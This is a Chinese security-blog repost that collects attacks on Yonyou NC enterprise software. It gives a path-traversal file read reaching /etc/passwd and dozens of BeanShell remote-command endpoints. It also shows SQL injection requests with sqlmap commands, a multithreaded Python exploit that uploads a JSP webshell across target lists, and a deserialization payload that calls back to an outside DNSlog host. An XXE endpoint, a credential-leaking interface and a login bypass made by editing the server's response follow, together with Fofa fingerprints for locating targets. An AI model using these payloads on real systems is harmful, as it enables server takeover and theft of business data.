一篇文章让你拿下用友nc

admin 2022年4月21日12:37:05安全文章评论256 views8346字阅读27分49秒阅读模式

免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。


一篇文章让你拿下用友nc

文章正文



转载链接:https://github.com/j2ekim/YonyouNC_Tip

用友NC漏洞整理

1 任意文件读取

filename参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件

http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename=/

一篇文章让你拿下用友nc


3.2 bsh.servlet.BshServlet 远程命令执行漏洞

用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过 BeanShell 执行远程命令获取服务器权限。

poc:

http://x.x.x.x/service/~aim/bsh.servlet.BshServlet
http://x.x.x.x/service/~alm/bsh.servlet.BshServlet
http://x.x.x.x/service/~ampub/bsh.servlet.BshServlet
http://x.x.x.x/service/~arap/bsh.servlet.BshServlet
http://x.x.x.x/service/~aum/bsh.servlet.BshServlet
http://x.x.x.x/service/~cc/bsh.servlet.BshServlet
http://x.x.x.x/service/~cdm/bsh.servlet.BshServlet
http://x.x.x.x/service/~cmp/bsh.servlet.BshServlet
http://x.x.x.x/service/~ct/bsh.servlet.BshServlet
http://x.x.x.x/service/~dm/bsh.servlet.BshServlet
http://x.x.x.x/service/~erm/bsh.servlet.BshServlet
http://x.x.x.x/service/~fa/bsh.servlet.BshServlet
http://x.x.x.x/service/~fac/bsh.servlet.BshServlet
http://x.x.x.x/service/~fbm/bsh.servlet.BshServlet
http://x.x.x.x/service/~ff/bsh.servlet.BshServlet
http://x.x.x.x/service/~fip/bsh.servlet.BshServlet
http://x.x.x.x/service/~fipub/bsh.servlet.BshServlet
http://x.x.x.x/service/~fp/bsh.servlet.BshServlet
http://x.x.x.x/service/~fts/bsh.servlet.BshServlet
http://x.x.x.x/service/~fvm/bsh.servlet.BshServlet
http://x.x.x.x/service/~gl/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrhi/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrjf/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrpd/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrpub/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrtrn/bsh.servlet.BshServlet
http://x.x.x.x/service/~hrwa/bsh.servlet.BshServlet
http://x.x.x.x/service/~ia/bsh.servlet.BshServlet
http://x.x.x.x/service/~ic/bsh.servlet.BshServlet
http://x.x.x.x/service/~iufo/bsh.servlet.BshServlet
http://x.x.x.x/service/~modules/bsh.servlet.BshServlet
http://x.x.x.x/service/~mpp/bsh.servlet.BshServlet
http://x.x.x.x/service/~obm/bsh.servlet.BshServlet
http://x.x.x.x/service/~pu/bsh.servlet.BshServlet
http://x.x.x.x/service/~qc/bsh.servlet.BshServlet
http://x.x.x.x/service/~sc/bsh.servlet.BshServlet
http://x.x.x.x/service/~scmpub/bsh.servlet.BshServlet
http://x.x.x.x/service/~so/bsh.servlet.BshServlet
http://x.x.x.x/service/~so2/bsh.servlet.BshServlet
http://x.x.x.x/service/~so3/bsh.servlet.BshServlet
http://x.x.x.x/service/~so4/bsh.servlet.BshServlet
http://x.x.x.x/service/~so5/bsh.servlet.BshServlet
http://x.x.x.x/service/~so6/bsh.servlet.BshServlet
http://x.x.x.x/service/~tam/bsh.servlet.BshServlet
http://x.x.x.x/service/~tbb/bsh.servlet.BshServlet
http://x.x.x.x/service/~to/bsh.servlet.BshServlet
http://x.x.x.x/service/~uap/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapbd/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapde/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapeai/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapother/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapqe/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapweb/bsh.servlet.BshServlet
http://x.x.x.x/service/~uapws/bsh.servlet.BshServlet
http://x.x.x.x/service/~vrm/bsh.servlet.BshServlet
http://x.x.x.x/service/~yer/bsh.servlet.BshServlet

一篇文章让你拿下用友nc

3.3 用友 NCCloud FS 文件管理 SQL 注入

用友 NCCloud FS 文件管理登录页面对用户名参数没有过滤,存在 SQL 注入。

Fofa:

"/platform/yonyou-yyy.js"

nccloud 登录界面:

一篇文章让你拿下用友nc

文件服务器管理登录页面:

http://x.x.x.x/fs/

一篇文章让你拿下用友nc

username参数存在注入,抓取登录数据包:

GET /fs/console?username=1&password=00PGRLxSTe3VroI21qJNymCrZfPX1UQ4ij0gIWn2Gc4%3D HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://x.x.x.x/fs/
Cookie: JSESSIONID=FFAE8EF48BD3BEF7E94B5449B8F9BA90.server
Upgrade-Insecure-Requests: 1

sqlmap 跑注入:

sqlmap -r text.txt -p username

一篇文章让你拿下用友nc

3.4 用友 NC 6.5 未授权文件上传漏洞

用友 NC6.5 版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。

Fofa:

"/platform/yonyou-yyy.js"

POC:

import requests
import threadpool
import urllib3
import sys
import argparse

urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
   "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
   "Content-Type": "application/x-www-form-urlencoded",
   "Referer": "https://google.com",
}

def multithreading(funcname, filename="url.txt", pools=5):
   works = []
   with open(filename, "r") as f:
       for i in f:
           func_params = [i.rstrip("n")]
           works.append((func_params, None))
   pool = threadpool.ThreadPool(pools)
   reqs = threadpool.makeRequests(funcname, works)
  [pool.putRequest(req) for req in reqs]
   pool.wait()

def wirte_targets(vurl, filename):
   with open(filename, "a+") as f:
       f.write(vurl + "n")
       return vurl
   
def exp(u):
   uploadHeader = {
       "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
       "Content-Type": "multipart/form-data;",
       "Referer": "https://google.com"
  }
   uploadData = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x02x74x00x09x46x49x4cx45x5fx4ex41x4dx45x74x00x09x74x30x30x6cx73x2ex6ax73x70x74x00x10x54x41x52x47x45x54x5fx46x49x4cx45x5fx50x41x54x48x74x00x10x2ex2fx77x65x62x61x70x70x73x2fx6ex63x5fx77x65x62x78"
   shellFlag="t0test0ls"
   uploadData+=shellFlag
   try:
       req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
       if req1.status_code == 200 :
           req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)

           if  req3.text.index(shellFlag)>=0:
               printFlag = "[Getshell]" + u+"/t00ls.jsp"  + "n"
               print (printFlag)
               wirte_targets(printFlag, "vuln.txt")
   except :
       pass
   #print(printFlag, end="")


if __name__ == "__main__":
   if (len(sys.argv)) < 2:
       print('useage : python' +str(sys.argv[0]) + ' -h')
   else:
       parser =argparse.ArgumentParser()
       parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
       parser.add_argument('-u',help="url -> example
"
,type=str,dest='check_url')

       parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
       args =parser.parse_args()
       if args.check_url:
           exp(args.check_url)
       
       if(args.check_file):
           multithreading(exp, args.check_file, 8)

当然也可以利用工具

用友NC-OA漏洞合集

3.5 用友 NC XbrlPersistenceServlet 反序列化

已知用友 NC6.5 版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。

/service/~xbrl/XbrlPersistenceServlet

POC:

import requests
import threadpool
import urllib3
import sys
import base64

ip = "x.x.x.x"
dnslog = "*****" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78"

uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)

3.6 用友 U8 OA SQL注入漏洞

用友 U8 OA test.jsp 文件存在 SQL 注入漏洞

Fofa:

"/yyoa/seeyonoa/common/"

POC:

/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

一篇文章让你拿下用友nc

sqlmap跑一下

一篇文章让你拿下用友nc

3.7 xxe漏洞

接口处的XXE漏洞

POC:

/uapws/service/nc.uap.oba.update.IUpdateService?wsdl

一篇文章让你拿下用友nc

3.8 接口信息泄露

在其中有个接口可以获取数据库账户密码,不过是老版本了

/uapws/service

一篇文章让你拿下用友nc

3.9 控制台密码绕过

账户密码随便填,抓包将返回包0改为1,即可任意用户登录

一篇文章让你拿下用友nc

一篇文章让你拿下用友nc





一篇文章让你拿下用友nc

技术交流





交流群



关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

一篇文章让你拿下用友nc




知识星球



星球不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全等

一篇文章让你拿下用友nc

一篇文章让你拿下用友nc

一篇文章让你拿下用友nc


一篇文章让你拿下用友nc


往期文章:




PHP代码审计系列(一) 基础:方法、思路、流程

spring cloud function spel表达式注入RCE复现

Zabbix 攻击面挖掘与利用

一篇文章带你学会容器逃逸

利用burp精准定位攻击者

Z20安全攻防知识星球




一篇文章让你拿下用友nc

点一下爱心再走吧!


原文始发于微信公众号(Z2O安全攻防):一篇文章让你拿下用友nc

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月21日12:37:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一篇文章让你拿下用友nc http://cn-sec.com/archives/931578.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: